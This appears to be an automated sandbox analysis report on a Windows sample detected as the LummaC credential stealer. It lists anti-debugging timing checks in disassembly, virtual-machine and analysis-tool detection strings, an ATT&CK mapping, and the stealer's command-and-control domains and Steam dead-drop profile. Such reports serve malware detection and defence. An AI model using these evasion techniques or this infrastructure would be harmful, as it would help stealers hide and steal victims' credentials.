    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B2BA second address: 48B2FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F2FF4BC0FB6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jnp 00007F2FF4BC0FB9h 0x00000013 movzx edx, ax 0x00000016 push dword ptr [ebp+12440002h] 0x0000001c push 00000000h 0x0000001e push ebx 0x0000001f call 00007F2FF4BC0FB8h 0x00000024 pop ebx 0x00000025 mov dword ptr [esp+04h], ebx 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc ebx 0x00000032 push ebx 0x00000033 ret 0x00000034 pop ebx 0x00000035 ret 0x00000036 mov edx, ecx 0x00000038 push 28A2FB69h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48B2FF second address: 48B30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2FF4F875FBh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CB1B second address: 48CB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F2FF4BC0FB6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48CB28 second address: 48CB59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007F2FF4F87601h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F2FF4F875FAh 0x00000018 jng 00007F2FF4F875FCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C669 second address: 48C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C66F second address: 48C676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48C676 second address: 48C686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F2FF4BC0FBAh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0001F second address: 4F0005B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ebx, 71729D4Eh 0x00000017 call 00007F2FF4F875FFh 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0005B second address: 4F0007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4BC0FC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0007D second address: 4F0009A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F0009A second address: 4F000AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2FF4BC0FBCh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F000AA second address: 4F000AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F000AE second address: 4F000C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F2FF4BC0FE5h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edx, eax 0x00000013 mov ax, 322Bh 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F000C6 second address: 4F000F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2FF4F87601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add eax, ecx 0x0000000b jmp 00007F2FF4F875FEh 0x00000010 mov eax, dword ptr [eax+00000860h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b mov ecx, edi 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F000F9 second address: 4F00131 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c jmp 00007F2FF4BC0FBAh 0x00000011 je 00007F30658B7C06h 0x00000017 jmp 00007F2FF4BC0FC0h 0x0000001c test byte ptr [eax+04h], 00000005h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 mov edi, 677CDD8Eh 0x00000028 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3A4268 second address: 3A426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 203AA8 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3964FA instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 203A1A instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 5284Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 3844Thread sleep time: -30000s >= -30000sJump to behavior
    Source: file.exe, file.exe, 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000000.00000003.1813197895.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000000FC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRL
    Source: file.exe, 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: $qEmu
    Source: file.exe, 00000000.00000003.1812736354.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813197895.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1814606395.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816020866.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Hides threads from debuggers
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Tries to detect sandboxes and other dynamic analysis tools (window names)
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E5BB0 LdrInitializeThunk,0_2_001E5BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    LummaC encrypted strings found
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.1813461032.0000000000378000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VProgram Manager
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter    		1
    DLL Side-Loading    		1
    Process Injection    		24
    Virtualization/Sandbox Evasion    		OS Credential Dumping631
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Process Injection    		LSASS Memory24
    Virtualization/Sandbox Evasion    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture114
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    steamcommunity.com0%VirustotalBrowse
    sensatinwu.buzz0%VirustotalBrowse
    bathdoomgaz.store1%VirustotalBrowse
    licendfilteo.site1%VirustotalBrowse
    mobbipenju.store1%VirustotalBrowse
    spirittunek.store1%VirustotalBrowse
    clearancek.site1%VirustotalBrowse
    studennotediw.store1%VirustotalBrowse
    dissapoiznw.store1%VirustotalBrowse
    eaglepawnoy.store1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://player.vimeo.com0%URL Reputationsafe
    https://player.vimeo.com0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steam.tv/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://lv.queniujq.cn0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://checkout.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/;0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/0%URL Reputationsafe
    https://api.steampowered.com/0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://www.youtube.com0%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://www.google.com0%VirustotalBrowse
    https://steamcommunity.com:443/profiles/765611997243319008%VirustotalBrowse
    https://www.youtube.com/0%VirustotalBrowse
    https://licendfilteo.site:443/api11%VirustotalBrowse
    https://store.steampowered.com/Z0%VirustotalBrowse
    https://www.google.com/recaptcha/0%VirustotalBrowse
    https://sketchfab.com0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a0%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/0%VirustotalBrowse
    https://steamcommunity.com/discussions/0%VirustotalBrowse
    https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&amp;l=e0%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truefalseunknown
    sensatinwu.buzz
    		188.114.96.3
    		truetrueunknown
    eaglepawnoy.store
    		unknown
    		unknownfalseunknown
    bathdoomgaz.store
    		unknown
    		unknownfalseunknown
    spirittunek.store
    		unknown
    		unknownfalseunknown
    licendfilteo.site
    		unknown
    		unknowntrueunknown
    studennotediw.store
    		unknown
    		unknownfalseunknown
    mobbipenju.store
    		unknown
    		unknownfalseunknown
    clearancek.site
    		unknown
    		unknowntrueunknown
    dissapoiznw.store
    		unknown
    		unknownfalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    studennotediw.stortrue
      		unknown
      mobbipenju.stortrue
        		unknown
        https://steamcommunity.com/profiles/76561199724331900true
        • URL Reputation: malware
        		unknown
        bathdoomgaz.stortrue
          		unknown
          dissapoiznw.stortrue
            		unknown
            spirittunek.stortrue
              		unknown
              eaglepawnoy.stortrue
                		unknown
                clearancek.sitetrue
                  		unknown
                  licendfilteo.sitetrue
                    		unknown
                    https://sensatinwu.buzz/apitrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://player.vimeo.comfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://eaglepawnoy.store:443/apijfile.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.youtube.comfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.comfile.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://s.ytimg.com;file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://steam.tv/file.exe, 00000000.00000003.1813045734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812736354.0000000001016000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://licendfilteo.site:443/apifile.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.1812861155.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.000000000102C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1816814540.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1812874348.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812686642.0000000001026000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812650614.0000000001032000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1812846129.000000000103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1813045734.0000000000F98000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000003.1813045734.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1815851267.0000000000F9F000.00000004.00000020.00020000.00000000.sdmpfalseunknown
